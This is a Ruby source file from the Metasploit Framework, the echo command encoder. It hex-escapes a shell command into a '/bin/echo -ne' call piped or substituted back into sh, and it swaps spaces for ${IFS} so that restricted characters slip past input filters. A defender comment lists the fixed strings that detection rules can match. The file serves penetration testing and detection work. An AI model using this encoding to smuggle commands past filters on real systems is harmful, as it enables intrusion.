Path: blob/master/modules/encoders/cmd/echo.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

#
# Command encoder that rewrites a POSIX shell command as a hex-escaped
# argument to /bin/echo -ne and feeds the decoded text back to a shell.
#
# Defender note: whenever encoding takes place, the emitted command contains
# the literal "/bin/echo -ne" followed by a run of \xNN escapes (with three
# backslashes per escape when single quotes are restricted), wrapped as
# "...|sh", in backticks, or in "$(...)". Whitespace may appear as "${IFS}".
# Those fixed strings are what command-line logging and detection rules can
# key on.
#
class MetasploitModule < Msf::Encoder
  Rank = GoodRanking

  #
  # Registers the module metadata with the framework.
  #
  def initialize
    super(
      'Name' => 'Echo Command Encoder',
      'Description' => %q{
        This encoder uses echo and backlash escapes to avoid commonly restricted characters.
      },
      'Author' => 'hdm',
      'Arch' => ARCH_CMD,
      'Platform' => %w[linux unix],
      'EncoderType' => Msf::Encoder::Type::CmdPosixEcho
    )
  end

  #
  # Entry point for encoding one block.
  #
  # Returns buf untouched when there are no restricted characters. Raises
  # EncodingError when '-' or '\' is restricted, since the wrapper emits
  # "-ne" and backslash escapes. Otherwise delegates to
  # encode_block_bash_echo.
  #
  def encode_block(state, buf)
    restricted = state.badchars

    # Nothing to avoid, nothing to encode
    return buf if restricted.empty?

    # Both the "-ne" switch and the backslash escapes are mandatory
    raise EncodingError if ['-', '\\'].any? { |required| restricted.include?(required) }

    encode_block_bash_echo(state, buf)
  end

  #
  # Hex-escapes every byte of buf and wraps it in a /bin/echo -ne invocation.
  #
  # The wrapper form is picked from the restricted characters: pipe to sh
  # first, then backticks, then "$(...)". EncodingError is raised when '|',
  # '`' and either '$' or '(' are all restricted.
  #
  # NOTE(review): only the characters tested here are compared with
  # badchars; the rest of the wrapper text is emitted as-is.
  #
  def encode_block_bash_echo(state, buf)
    restricted = state.badchars
    bytes = buf.unpack('C*')

    # Single quotes are the preferred way to protect the escapes; without
    # them each escape carries extra backslashes instead
    hex =
      if restricted.include?("'")
        bytes.map { |byte| format('\\\\\\x%.2x', byte) }.join
      else
        quoted = bytes.map { |byte| format('\\x%.2x', byte) }.join
        "'#{quoted}'"
      end

    echo = "/bin/echo -ne #{hex}"

    wrapped =
      if !restricted.include?('|')
        "#{echo}|sh"
      elsif !restricted.include?('`')
        "`#{echo}`"
      elsif restricted.include?('$') || restricted.include?('(')
        # No usable wrapper form is left
        raise EncodingError
      else
        "$(#{echo})"
      end

    # Swap whitespace for ${IFS} when a literal space is restricted
    wrapped.gsub!(/\s/, '${IFS}') if restricted.include?(' ')

    wrapped
  end
end